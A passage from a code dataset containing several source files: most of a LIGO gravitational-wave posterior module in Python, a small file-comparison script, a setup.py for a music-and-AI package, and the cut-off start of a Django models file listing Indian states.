One sqrt(2) from\n # one-sided-->two-sided, and the other from <|z|> =\n # sqrt(2) if x,y ~ N(0,1).\n self.data[j] = 0.5*np.sqrt(psd[j]/(self.fs[1]-self.fs[0]))*(np.random.normal(size=data_length) +\n np.random.normal(size=data_length)*1j)\n self.data[j][psd[j]==float('inf')] = 0.0\n\n # Reset random state\n if dataseed is not None:\n np.random.set_state(old_state)\n elif time_data is None:\n self._data = freq_data\n else:\n self._data = []\n for i in range(len(detectors)):\n N = time_data[i].shape[0]\n\n this_srate = float(N)/self.T\n dt = 1.0/this_srate\n\n window = u.tukey_window(N)\n\n fdata = np.fft.rfft(time_data[i]*window)*dt\n\n # Now cut down to the actual sample rate\n self._data.append(fdata[:data_length])\n\n self._c2r_input_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._c2r_output_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, \n direction='forward', flags=['measure']) \n\n self._r2c_input_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._r2c_output_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n\n if inj_xml is not None:\n params = self.inj_xml_to_params(inj_xml)\n hs = self.generate_waveform(params)\n for i, h in enumerate(hs):\n self.data[i] += h\n elif inj_params is not None:\n hs = self.generate_waveform(inj_params)\n for i,h in enumerate(hs):\n self.data[i] += h\n \n # Handle unpickling the internal state\n def __setstate__(self, state):\n for k,v in state.items():\n self.__dict__[k] = v\n\n # Just the FFTW3 Plans are screwed up:\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, direction='forward', flags=['measure']) \n\n @property\n def data(self):\n \"\"\"The frequency-domain data on which the analysis will be conducted.\"\"\"\n return self._data\n\n @property\n def T(self):\n \"\"\"The length (in seconds) of the input data segment.\"\"\"\n return self._T\n\n @property\n def fs(self):\n \"\"\"The frequencies (in Hz) that correspond to the frequency domain data.\"\"\"\n return self._fs\n\n @property\n def df(self):\n \"\"\"The spacing in frequency space.\n\n \"\"\"\n return self.fs[1]-self.fs[0]\n\n @property\n def srate(self):\n \"\"\"The sample rate of the time-domain data.\"\"\"\n return self._srate\n \n @property\n def time_offset(self):\n \"\"\"The GPS time of the start of the data segment.\"\"\"\n return self._time_offset\n\n @property \n def approx(self):\n \"\"\"The waveform approximant.\"\"\"\n return self._approx\n\n @property\n def amp_order(self):\n \"\"\"Amplitude order (``-1`` for max order).\"\"\"\n return self._amp_order\n\n @property\n def phase_order(self):\n \"\"\"The phase order (``-1`` for max order).\"\"\"\n return self._phase_order\n\n @property\n def fmin(self):\n \"\"\"The minimum frequency of the analysis.\"\"\"\n return self._fmin\n\n @property\n def fref(self):\n \"\"\"The reference frequency at which freq-dependent waveform quantities\n are defined.\"\"\"\n\n return self._fref\n\n @property\n def psd(self):\n \"\"\"The array of (one-sided) noise PSDs used in the analysis (one per\n detector).\"\"\"\n return 
self._psd\n\n @property\n def npsdfit(self):\n \"\"\"The number of PSD fitting parameters to use.\n\n \"\"\"\n\n return self._npsdfit\n\n @property\n def psdfitfs(self):\n \"\"\"The frequencies at which the PSD fit spline knots live.\n\n \"\"\"\n\n return self._psdfitfs\n\n @property\n def msnr(self):\n \"\"\"The SNR below which the prior goes to zero (or ``None`` for no threshold).\"\"\"\n return self._msnr\n\n @property\n def mmin(self):\n \"\"\"The minimum component mass.\"\"\"\n return self._mmin\n\n @property\n def mmax(self):\n \"\"\"The maximum component mass.\"\"\"\n return self._mmax\n\n @property\n def dmax(self):\n \"\"\"The maximum distance.\"\"\"\n return self._dmax\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def ndetectors(self):\n return len(self.detectors)\n\n @property \n def c2r_input_fft_array(self):\n return self._c2r_input_fft_array\n\n @property\n def c2r_output_fft_array(self):\n return self._c2r_output_fft_array\n\n @property\n def c2r_fft_plan(self):\n return self._c2r_fft_plan\n\n @property\n def r2c_input_fft_array(self):\n return self._r2c_input_fft_array\n\n @property\n def r2c_output_fft_array(self):\n return self._r2c_output_fft_array\n\n @property\n def r2c_fft_plan(self):\n return self._r2c_fft_plan\n\n @property\n def nparams(self):\n \"\"\"The dimensionality of the parameter space.\"\"\"\n return 15 + self.ndetectors*self.npsdfit\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'time', 'ra',\n 'sin_dec', 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n def to_params(self, p):\n return p.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('time', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n\n def adjusted_psd(self, params):\n \"\"\"Returns a PSD for each detector, adjusted by the PSD parameters for\n that detector.\n\n \"\"\"\n\n if self.npsdfit == 0:\n return self.psd\n\n params = self.to_params(params)\n sel = self.fs >= self.fmin\n\n fs = self.fs[sel]\n\n psds = []\n\n for raw_psd, psdp in zip(self.psd, params['psdfit'].squeeze()):\n log_factors = si.InterpolatedUnivariateSpline(np.log(self.psdfitfs), psdp)(np.log(fs))\n\n psd = raw_psd.copy()\n psd[sel] *= np.exp(log_factors)\n\n psds.append(psd)\n\n return psds\n\n def inj_xml_to_params(self, inj_xml, event=0, psdfit=None):\n \"\"\"Returns the parameters that correspond to the given XML file,\n optionally with the given PSD fitting parameters.\n\n :param inj_xml: Filename of the injection XML.\n\n :param event: The event number to use from the XML.\n\n :param psdfit: The PSD fitting parameters to add to the\n returned parameters.\n\n \"\"\"\n\n p = self.to_params(np.zeros(self.nparams))\n\n table = SimInspiralUtils.ReadSimInspiralFromFiles([inj_xml])[event]\n\n p['log_mc'] = np.log(table.mchirp)\n p['eta'] = table.eta\n p['log_dist'] = np.log(table.distance)\n p['ra'] = table.longitude\n p['sin_dec'] = np.sin(table.latitude)\n p['cos_iota'] = np.cos(table.inclination)\n 
p['phi'] = table.coa_phase\n p['psi'] = table.polarization\n \n time_offset = self.time_offset.LIGOTimeGPS\n p['time'] = table.geocent_end_time - time_offset.gpsSeconds + 1e-9*(table.geocent_end_time_ns - time_offset.gpsNanoSeconds)\n\n s1 = np.array([table.spin1x, table.spin1y, table.spin1z])\n s2 = np.array([table.spin2x, table.spin2y, table.spin2z])\n\n Lhat = np.array([np.sin(table.inclination), 0.0, np.cos(table.inclination)])\n xhat = np.array([np.cos(table.inclination), 0.0, -np.sin(table.inclination)])\n yhat = np.array([0.0,1.0,0.0])\n\n if np.linalg.norm(s1) == 0.0:\n p['a1'] = 0.0\n p['cos_tilt1'] = 1.0\n p['phi1'] = 0.0\n else:\n a1 = np.linalg.norm(s1)\n p['a1'] = a1\n p['cos_tilt1'] = np.dot(s1, Lhat)/a1\n p['phi1'] = np.arctan2(np.dot(s1, yhat), np.dot(s1, xhat))\n if p['phi1'] < 0.0:\n p['phi1'] += 2.0*np.pi\n\n if np.linalg.norm(s2) == 0.0:\n p['a2'] = 0.0\n p['cos_tilt2'] = 1.0\n p['phi2'] = 0.0\n else:\n a2 = np.linalg.norm(s2)\n p['a2'] = a2\n p['cos_tilt2'] = np.dot(s2, Lhat)/a2\n p['phi2'] = np.arctan2(np.dot(s2, yhat), np.dot(s2, xhat))\n if p['phi2'] < 0.0:\n p['phi2'] += 2.0*np.pi\n\n if psdfit is not None:\n p['psdfit'] = psdfit\n\n return p\n\n\n def generate_waveform(self, params):\n \"\"\"Returns a frequency-domain strain suitable to subtract from the\n frequency-domain data (i.e. the samples line up in frequency\n space).\n \"\"\"\n\n params = self.to_params(params).squeeze()\n\n # Can only handle one parameter set at a time, so extract\n # first from array if more than one.\n if isinstance(params, np.ndarray) and params.ndim > 0:\n params = params[0]\n elif isinstance(params, np.ndarray):\n params = params[()]\n \n m1,m2 = u.mc_eta_to_masses(np.exp(params['log_mc']), params['eta'])\n d = 1e6*lal.PC_SI*np.exp(params['log_dist'])\n i = np.arccos(params['cos_iota'])\n\n dec = np.arcsin(params['sin_dec'])\n\n inc = np.arccos(params['cos_iota'])\n\n a1 = params['a1']\n tilt1 = np.arccos(params['cos_tilt1'])\n phi1 = params['phi1']\n a2 = params['a2']\n tilt2 = np.arccos(params['cos_tilt2'])\n phi2 = params['phi2']\n\n zhat = np.array([np.sin(inc), 0.0, np.cos(inc)])\n xhat = np.array([np.cos(inc), 0.0, -np.sin(inc)])\n yhat = np.array([0.0, 1.0, 0.0])\n\n s1 = a1 * (np.cos(phi1)*np.sin(tilt1)*xhat +\\\n np.sin(phi1)*np.sin(tilt1)*yhat +\\\n np.cos(tilt1)*zhat)\n s2 = a2 * (np.cos(phi2)*np.sin(tilt2)*xhat +\\\n np.sin(phi2)*np.sin(tilt2)*yhat +\\\n np.cos(tilt2)*zhat)\n\n if ls.SimInspiralImplementedFDApproximants(self.approx) == 1:\n hplus,hcross = ls.SimInspiralChooseFDWaveform(params['phi'], \n self.fs[1]-self.fs[0],\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fs[-1], 100.0,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n\n # If necessary, cut down to size\n if hpdata.shape[0] > self.fs.shape[0]:\n hpdata = hpdata[:self.fs.shape[0]]\n hcdata = hcdata[:self.fs.shape[0]]\n else:\n hplus,hcross = ls.SimInspiralChooseTDWaveform(params['phi'],\n 1.0/self.srate,\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fref,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n \n Ntime = (self.data[0].shape[0]-1)*2\n \n # Cut down to length if necessary\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n tC_index = int(round(-(hplus.epoch.gpsSeconds + 1e-9*hplus.epoch.gpsNanoSeconds)*self.srate))\n if hpdata.shape[0] > Ntime:\n 
tC_index -= hpdata.shape[0] - Ntime\n                hpdata = hpdata[-Ntime:]\n                hcdata = hcdata[-Ntime:]\n\n            # Now Fourier transform; place the waveform's tC index\n            # into the zero index of the FT array\n            Nbegin = hpdata.shape[0] - tC_index\n\n            self.r2c_input_fft_array[:] = 0.0\n            self.r2c_input_fft_array[:Nbegin] = hpdata[tC_index:]\n            self.r2c_input_fft_array[-tC_index:] = hpdata[:tC_index]\n            self.r2c_fft_plan()\n            hpdata = self.r2c_output_fft_array / self.srate # multiply by dt\n            \n            self.r2c_input_fft_array[:] = 0.0\n            self.r2c_input_fft_array[:Nbegin] = hcdata[tC_index:]\n            self.r2c_input_fft_array[-tC_index:] = hcdata[:tC_index]\n            self.r2c_fft_plan()\n            hcdata = self.r2c_output_fft_array / self.srate # multiply by dt\n\n        hout=[]\n        for d in self.detectors:\n            sec = self.time_offset.sec + int(params['time'])\n            ns = self.time_offset.ns + int(round(1e9*(params['time']-int(params['time']))))\n\n            while ns > 1e9:\n                sec += 1\n                ns -= 1e9\n            \n            tgps = lal.LIGOTimeGPS(sec, nanoseconds=ns)\n\n            gmst = lal.GreenwichMeanSiderealTime(tgps)\n\n            if d == 'H1':\n                diff = lal.LALDetectorIndexLHODIFF\n            elif d == 'L1':\n                diff = lal.LALDetectorIndexLLODIFF\n            elif d == 'V1':\n                diff = lal.LALDetectorIndexVIRGODIFF\n            else:\n                raise ValueError('detector not recognized: ' + d)\n            \n            location = lal.CachedDetectors[diff].location\n\n            timedelay = lal.TimeDelayFromEarthCenter(location, params['ra'], dec, tgps)\n\n            timeshift = params['time'] + timedelay\n            \n            fplus, fcross = lal.ComputeDetAMResponse(lal.CachedDetectors[diff].response,\n                                                     params['ra'], dec, params['psi'], gmst)\n\n            h = combine_and_timeshift(fplus, fcross, hpdata, hcdata, self.fs, timeshift)\n\n            hout.append(h)\n\n        return hout\n\n    def malmquist_snr(self, params):\n        \"\"\"Returns the SNR that will be used in the Malmquist threshold in the\n        likelihood function.\n\n        The malmquist SNR is either:\n\n        * The SNR in the second-loudest detector if there are two or\n          more detectors.\n\n        * The SNR if there is only one detector.\n\n        The intention is to approximate a coincidence threshold from a\n        pipeline.\n\n        \"\"\"\n\n        hs = self.generate_waveform(params)\n        df = self.fs[1] - self.fs[0]\n\n        adj_psd = self.adjusted_psd(params)\n        rhos = [np.sqrt(4.0*df*np.real(np.sum(np.conj(h)*h/psd))) for h, psd in zip(hs, adj_psd)]\n        \n        if len(rhos) > 1:\n            rhos.sort()\n            return rhos[-2]\n        else:\n            return rhos[0]\n\n    def log_likelihood(self, params):\n        r\"\"\"Returns the log likelihood of the given parameters.  The\nlog-likelihood is\n\n        .. math::\n            \n            \\log \\mathcal{L} = -\\frac{1}{2} \\left( \\left\\langle d | d \\right\\rangle -2 \\Re \\left\\langle d | h \\right\\rangle + \\left\\langle h | h \\right\\rangle \\right) - \\frac{1}{2} \\sum \\log S(f)\n\n        where \n\n        .. 
math::\n\n            \\left\\langle a | b \\right\\rangle = 4 \\int df \\, \\frac{a^*(f) b(f)}{S(f)},\n\n        where :math:`S(f)` is the one-sided noise power spectral density.\n\n        This corresponds to the usual log-likelihood in Gaussian\n        noise, accounting for the fact that parameters can cause the\n        PSD to vary.\n\n        If the :attr:`Posterior.malmquist_snr` is not ``None``, then\n        the likelihood will be returned as ``float('-inf')`` when\n        :math:`\\left\\langle h | h \\right\\rangle^{1/2}` is smaller than\n        :attr:`Posterior.malmquist_snr`\"\"\"\n\n        hs = self.generate_waveform(params)\n        df = self.fs[1] - self.fs[0]\n\n        istart = np.nonzero(self.fs >= self.fmin)[0][0]\n\n        hh_list=[]\n        logl = 0.0\n        adj_psd = self.adjusted_psd(params)\n        for h, d, psd in zip(hs, self.data, adj_psd):\n            hh,dh,dd = data_waveform_inner_product(istart, df, psd, h, d)\n\n            hh_list.append(hh)\n\n            logl += -0.5*(hh - 2.0*dh + dd)\n            logl -= np.sum(np.log(2.0*np.pi*psd[istart:]/(4.0*(self.fs[1]-self.fs[0]))))\n\n        # If malmquist priors, then cutoff when the SNR is too quiet.\n        # The threshold applies to the second-loudest detector, as in\n        # malmquist_snr above.\n        hh_list.sort()\n        if self.msnr is not None:\n            if len(hh_list) > 1 and hh_list[-2] < self.msnr*self.msnr:\n                return float('-inf')\n            elif len(hh_list) == 1 and hh_list[0] < self.msnr*self.msnr:\n                return float('-inf')\n\n        return logl\n\n    def log_prior(self, params):\n        \"\"\"Returns the log of the prior.  More details to follow.  \n        \"\"\"\n        params = self.to_params(params)\n\n        if isinstance(params, np.ndarray):\n            params = params[0]\n\n        if params['eta'] < 0 or params['eta'] > 0.25:\n            return float('-inf')\n\n        # First basic ranges on parameters:\n        mc = np.exp(params['log_mc'])\n        d = np.exp(params['log_dist'])\n        m1,m2=u.mc_eta_to_masses(mc, params['eta'])\n        mtot = m1+m2\n\n        if m1 > self.mmax or m2 < self.mmin:\n            return float('-inf')\n\n        if params['cos_iota'] < -1.0 or params['cos_iota'] > 1.0:\n            return float('-inf')\n\n        if params['phi'] > 2.0*np.pi or params['phi'] < 0.0:\n            return float('-inf')\n\n        if params['psi'] > 2.0*np.pi or params['psi'] < 0.0:\n            return float('-inf')\n\n        if params['time'] < 0 or params['time'] > self.T:\n            return float('-inf')\n\n        if params['ra'] < 0.0 or params['ra'] > 2.0*np.pi:\n            return float('-inf')\n\n        if params['sin_dec'] < -1.0 or params['sin_dec'] > 1.0:\n            return float('-inf')\n\n        if d > self.dmax:\n            return float('-inf')\n\n        if params['a1'] <= 0.0 or params['a1'] >= 1.0:\n            return float('-inf')\n\n        if params['a2'] <= 0.0 or params['a2'] >= 1.0:\n            return float('-inf')\n\n        if params['cos_tilt1'] < -1.0 or params['cos_tilt1'] > 1.0:\n            return float('-inf')\n\n        if params['cos_tilt2'] < -1.0 or params['cos_tilt2'] > 1.0:\n            return float('-inf')\n\n        if params['phi1'] < 0.0 or params['phi1'] >= 2.0*np.pi:\n            return float('-inf')\n\n        if params['phi2'] < 0.0 or params['phi2'] >= 2.0*np.pi:\n            return float('-inf')\n\n        logp = 0.0\n\n        # A flat prior in mass space gives the following in log(mc)-eta space:\n        logp -= np.log(m1-m2) - 3.0*np.log(mtot)\n        \n        # Prior volumetric in distance:\n        logp += 3.0*params['log_dist']\n\n        # N(0,1) prior on PSD parameters (which are log(factor) at\n        # each frequency).\n        logp += np.sum(u.norm_logpdf(params['psdfit']))\n\n        if isinstance(logp, np.ndarray):\n            if logp.ndim > 0:\n                logp = logp[0]\n            else:\n                logp = logp[()]\n\n        return logp\n\n    def draw_prior(self, shape=(1,)):\n        params = self.to_params(np.zeros(shape+(self.nparams,))).squeeze()\n\n        m1s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n        m2s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n\n        mc, eta = u.masses_to_mc_eta(m1s, m2s)\n\n        params['log_mc'] = 
np.log(mc)\n params['eta'] = eta\n\n params['cos_iota'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi'] = np.random.uniform(low=0.0, high=np.pi, size=shape)\n params['psi'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['time'] = np.random.uniform(low=0.0, high=self.T, size=shape)\n params['ra'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['sin_dec'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['log_dist'] = np.log(self.dmax) + (1.0/3.0)*np.log(np.random.uniform(size=shape))\n params['a1'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['a2'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['cos_tilt1'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['cos_tilt2'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi1'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['phi2'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n\n params['psdfit'] = np.random.normal(size=shape + (len(self.detectors), self.npsdfit))\n\n return params\n\n def argmax_log_likelihood_tphid(self, params):\n params = self.to_params(params)\n\n df = self.fs[1] - self.fs[0]\n hs = self.generate_waveform(params)\n\n \n dh_dt_cos = 0.0\n dh_dt_sin = 0.0\n hh = 0.0\n adj_psd = self.adjusted_psd(params)\n\n for d, h, psd in zip(self.data, hs, adj_psd):\n conj_d = np.conj(d)\n dh_real = 2.0*df*conj_d*np.real(h)/psd\n dh_imag = 2.0*df*conj_d*np.imag(h)/psd\n\n self.c2r_input_fft_array[:] = dh_real\n self.c2r_fft_plan()\n dh_dt_cos += self.c2r_output_fft_array\n\n self.c2r_input_fft_array[:] = dh_imag\n self.c2r_fft_plan()\n dh_dt_sin += self.c2r_output_fft_array\n\n hh += np.sum(4.0*df*np.abs(h)*np.abs(h)/psd)\n\n\n dh_dt = np.sqrt(dh_dt_cos*dh_dt_cos + dh_dt_sin*dh_dt_sin)\n idt = np.argmax(dh_dt)\n\n if idt == 0:\n a = np.abs(dh_dt[0])\n b = np.abs(dh_dt[1])\n c = np.abs(dh_dt[2])\n i0 = 0\n elif idt == len(dh_dt) - 1:\n a = np.abs(dh_dt[-3])\n b = np.abs(dh_dt[-2])\n c = np.abs(dh_dt[-1])\n i0 = len(dh_dt) - 3\n else:\n a = np.abs(dh_dt[idt-1])\n b = np.abs(dh_dt[idt])\n c = np.abs(dh_dt[idt+1])\n i0 = idt-1\n\n imax = i0 + 0.5 + (a-b)/(a+c-2.0*b)\n\n dt_max = imax/float(self.srate)\n dphi_max = -0.5*np.arctan2(dh_dt_sin[idt], dh_dt_cos[idt])\n\n dh_max = np.abs(dh_dt[idt])\n dfactor = hh / dh_max\n logd_max = params['log_dist'] + np.log(dfactor)\n\n max_params = params.copy()\n\n max_params['log_dist'] = logd_max\n\n max_params['phi'] = np.mod(params['phi'] + dphi_max, np.pi)\n if max_params['phi'] < 0:\n max_params['phi'] += np.pi\n\n max_params['time'] = np.mod(params['time'] + dt_max, self.T)\n\n return max_params\n\n def __call__(self, params):\n lp = self.log_prior(params)\n\n if lp == float('-inf'):\n return lp\n\n return lp + self.log_likelihood(params)\n\nclass TimeMarginalizedPosterior(Posterior):\n \"\"\"Posterior that marginalizes out the time variable on each\n likelihood call.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"See :method:`Posterior.__init__`.\"\"\"\n super(TimeMarginalizedPosterior, self).__init__(*args, **kwargs)\n\n def to_params(self, params):\n try:\n return params.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + \\\n [('psdfit', np.float, (self.ndetectors, 
self.npsdfit))])\n except:\n return super(TimeMarginalizedPosterior, self).to_params(params)\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'ra', 'sin_dec', \n 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n @property\n def tm_nparams(self):\n return 14 + self.ndetectors*self.npsdfit\n\n def to_super_params(self, params, time=0):\n params = self.to_params(params)\n sps = super(TimeMarginalizedPosterior, self).to_params(np.zeros(params.shape + (self.nparams,)))\n\n for name in params.dtype.names:\n sps[name] = params[name]\n\n sps['time'] = time\n\n return sps\n\n def from_super_params(self, params):\n params = self.to_params(params)\n sps = self.to_params(np.zeros(params.shape+(self.tm_nparams,))).squeeze()\n\n for name in sps.dtype.names:\n sps[name] = params[name]\n\n return sps\n\n def adjusted_psd(self, params):\n pfull = self.to_super_params(params)\n return super(TimeMarginalizedPosterior, self).adjusted_psd(pfull)\n\n def malmquist_snr(self, params):\n \"\"\"See :method:`Posterior.malmquist_snr`.\"\"\"\n p = self.to_super_params(params, time=0)\n\n return super(TimeMarginalizedPosterior, self).malmquist_snr(p)\n\n def time_integrate(self, log_ls):\n \"\"\"Returns the log of the integral of the given log(L) values as a\n function of time, using an analytic, quadratic interpolation\n of the log(L) values.\n\n \"\"\"\n \n full_log_ls = np.zeros(log_ls.shape[0]+1)\n full_log_ls[:-1] = log_ls\n full_log_ls[-1] = log_ls[0]\n\n dt = 1.0/self.srate\n\n # dt*sum(log_ls) = dt*(1/2*fll[0] + fll[1] + ... 
+ fll[N-1] + 1/2*fll[N])\n # This is the trapezoid rule for the integral.\n log_best_integral = logaddexp_sum(log_ls) + np.log(dt)\n\n return log_best_integral\n\n def log_likelihood(self, params):\n \"\"\"Returns the marginalized log-likelihood at the given params (which\n should have all parameters but time).\"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time=0)\n\n hs = self.generate_waveform(params_full)\n\n ll = 0.0\n df = self.fs[1] - self.fs[0]\n\n hh_list = []\n dh_timeshifts = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dd = hh_dd_sum(df, psd, h, d)\n\n hh_list.append(hh)\n\n fill_fft_array(df, psd, d, h, self.c2r_input_fft_array)\n self.c2r_fft_plan()\n dh_timeshifts += self.c2r_output_fft_array\n \n ll += -0.5*(hh + dd)\n ll -= np.sum(np.log(2.0*np.pi*psd[psd != float('inf')]/(4.0*(self.fs[1]-self.fs[0]))))\n\n dh = self.time_integrate(dh_timeshifts)\n ll += dh\n\n # Normalization for time integral\n ll -= np.log(self.T)\n\n if self.msnr is not None:\n if len(hh_list) == 1:\n hh2nd = hh_list[0]\n else:\n hh_list.sort()\n hh2nd = hh_list[-2]\n\n if hh2nd < self.msnr*self.msnr:\n return float('-inf')\n\n return ll\n\n def log_prior(self, params):\n \"\"\"Log prior; same as :method:`Posterior.log_prior`, but without\n `time` column.\n\n \"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time = 0.5*self.T)\n\n return super(TimeMarginalizedPosterior, self).log_prior(params_full)\n\n def draw_prior(self, shape=(1,)):\n pfull = super(TimeMarginalizedPosterior, self).draw_prior(shape=shape)\n return self.from_super_params(pfull)\n\n def argmax_log_likelihood_phid(self, params):\n params_full = self.to_super_params(params, time = 0.5*self.T)\n \n p = self.from_super_params(super(TimeMarginalizedPosterior, self).argmax_log_likelihood_tphid(params_full))\n\n return p\n\nclass NoiseOnlyPosterior(Posterior):\n \"\"\"Represents the posterior for a noise-only model.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(NoiseOnlyPosterior, self).__init__(*args, **kwargs)\n\n @property\n def header(self):\n header = []\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n\n @property\n def no_nparams(self):\n return self.ndetectors*self.npsdfit\n\n def to_params(self, params):\n try:\n return params.view([('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(NoiseOnlyPosterior, self).to_params(params)\n\n def generate_waveform(self, params):\n if params.view(float).shape[0] == self.no_nparams:\n hs = []\n for d in self.data:\n hs.append(0.0*d)\n return hs\n else:\n return super(NoiseOnlyPosterior, self).generate_waveform(params)\n\n def log_prior(self, params):\n return np.sum(u.norm_logpdf(params))\n\n def draw_prior(self, shape=(1,)):\n return self.to_params(np.random.normal(size=shape+(self.ndetectors*self.npsdfit,)))\n\n \n","repo_name":"farr/nu-ligo-utils","sub_path":"ensemble-sampler/posterior.py","file_name":"posterior.py","file_ext":"py","file_size_in_byte":37170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70724901870","text":"#!/usr/bin/env python\n\nc1 = open(\"Comp1.txt\", \"r\")\nc2 = open(\"Comp2.txt\", \"r\")\narchivoUno = c1.readlines()\narchivoDos = c2.readlines()\nc1.close()\nc2.close()\nresult = open(\"resultado.txt\", \"w\")\n\nx = 0\nfor i in archivoUno:\n if i != archivoDos[x]:\n result.write(i+\"El otro archivo contiene >> \"+archivoDos[x])\n x += 1\n\n\t\nresult.close()","repo_name":"jetsky0/projectvoteredes","sub_path":"huellas_ordinario.py","file_name":"huellas_ordinario.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"23708278234","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nrequirements = [\n 'numpy',\n 'matplotlib',\n 'pretty_midi',\n 'pyFluidSynth >= 1.2.5',\n 'librosa',\n 'essentia',\n 'keras',\n 'tensorflow',\n]\n\nsetup(\n name='mai',\n version='0.0.1',\n description='Music and Artificial Intelligence',\n long_description=readme,\n author='David Kant',\n author_email='dkant@ucsc.edu',\n url='https://canvas.ucsc.edu/courses/12767',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')),\n install_requires=requirements\n)\n","repo_name":"davidkant/mai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"}
+{"seq_id":"71450660271","text":"from uuid import uuid4\n\nimport pdfkit\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.validators import (\n MaxValueValidator,\n MinValueValidator,\n FileExtensionValidator,\n)\nfrom django.db import models\nfrom django.template.loader import render_to_string\n\nfrom accounts.models import UserAccount, Student, Session\n\nSTATE_CHOICES = (\n (\"Andhra Pradesh\", \"Andhra Pradesh\"),\n (\"Arunachal Pradesh\", \"Arunachal Pradesh\"),\n (\"Assam\", \"Assam\"),\n (\"Bihar\", \"Bihar\"),\n (\"Chhattisgarh\", \"Chhattisgarh\"),\n (\"Goa\", \"Goa\"),\n (\"Gujarat\", \"Gujarat\"),\n (\"Haryana\", \"Haryana\"),\n (\"Himachal Pradesh\", \"Himachal Pradesh\"),\n (\"Jharkhand\", \"Jharkhand\"),\n (\"Karnataka\", \"Karnataka\"),\n (\"Kerala\", \"Kerala\"),\n (\"Madhya Pradesh\", \"Madhya Pradesh\"),\n (\"Maharashtra\", \"Maharashtra\"),\n (\"Manipur\", \"Manipur\"),\n (\"Meghalaya\", \"Meghalaya\"),\n (\"Mizoram\", \"Mizoram\"),\n (\"Nagaland\", \"Nagaland\"),\n (\"Odisha\", \"Odisha\"),\n (\"Punjab\", \"Punjab\"),\n (\"Rajasthan\", \"Rajasthan\"),\n (\"Sikkim\", 